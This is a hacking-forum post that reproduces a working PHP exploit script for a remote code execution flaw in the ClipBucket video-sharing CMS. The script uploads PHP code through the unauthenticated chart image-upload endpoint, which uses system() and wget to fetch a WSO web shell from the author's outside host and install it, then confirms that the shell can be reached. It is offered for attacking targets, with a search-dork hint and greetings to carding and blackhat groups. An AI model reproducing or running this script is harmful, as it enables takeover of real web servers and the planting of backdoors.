Jump to content
cPanel

ClipBucket Remote Code Execution Vulnerability

Recommended Posts

###
# __________.__ _________ _________
# \__ ___/| |__ ____ \_ ___ \_______ ______ _ ________ \_ ___ \_______ ______ _ __
# | | | | \_/ __ \ / \ \/\_ __ \/ _ \ \/ \/ / ___/ / \ \/\_ __ \_/ __ \ \/ \/ /
# | | | Y \ ___/ \ \____| | \( <_> ) /\___ \ \ \____| | \/\ ___/\ /
# |____| |___| /\___ > \______ /|__| \____/ \/\_//____ > \______ /|__| \___ >\/\_/
# \/ \/ \/ \/ \/ \/
#
#
#[url=http://thecrowscrew.org]-=[ The Crows Crew Official Website ]=-[/url]
###
# Exploit title : ClipBucket Remote Code Execution Vulnerability
# Author : Gabby
# Dork = use ur brain
# Vendor Site : [url=http://clip-bucket.com/]ClipBucket – Free Video Sharing Website Script, Youtube, Daily-motion Clone, PHP Video Script, Media Sharing CMS, Best PHP Solution for Social Networking.[/url]
# Software Download : [url=http://sourceforge.net/projects/clipbucket/]ClipBucket | Free software downloads at SourceForge.net[/url]
###
<?php
$options = getopt('t:n:');
if(!isset($options['t'], $options['n']))
die("\n [+] Simple Exploiter ClipBucket by Gabby [+] \n Usage : php clip.php -t [url=http://target.com]Target : Expect More. Pay Less.[/url] -n bie.php\n

-t [url=http://target.com]Target : Expect More. Pay Less.[/url] = Target mu ..
-n bie.php = Nama file yang mau kamu pakai...\n\n");

$target = $options['t'];
$nama = $options['n'];
$shell = "{$target}/admin_area/charts/tmp-upload-images/{$nama}";
$target = "{$target}/admin_area/charts/ofc-library/ofc_upload_image.php?name={$nama}";
$data = '<?php
system("wget [url=http://gabby.ga/shell/wso.txt;]CirtexHosting - Site Suspended[/url] mv wso.txt bie.php");
fclose ( $handle );
?>';
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');
echo "============================================ \n";
echo ": Simple Exploiter ClipBucket by Gabby :\n";
echo "============================================ \n\n";
echo "[+] Upload Shell ke : {$options['t']}\n";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $target);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "[+] Exploit Sukses,.. \n";
echo "[+] {$shell}\n";
}
else
{
die("[-] Exploit Gagal,.. \n");
}

?>

see on ss :
1. [url]http://i.imgur.com/SZGVraC.png[/url]
2. [url]http://i.imgur.com/1X0WzeH.png[/url]

####
Thanks to :
Catalyst71, kit4r0, 777r, ovanIsmycode, walangkaji, y0g4, my "Dad", my sista Wii, cW3 G4pt3K,
Red-x, Vanda, Deb, Sultan, Meninbox, n all my luvly friend,..
Greets to :
Yogyacarderlink, SurabayaBlackhat,..^^
####

Edited by TheTime
lipsa taguri PHP
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...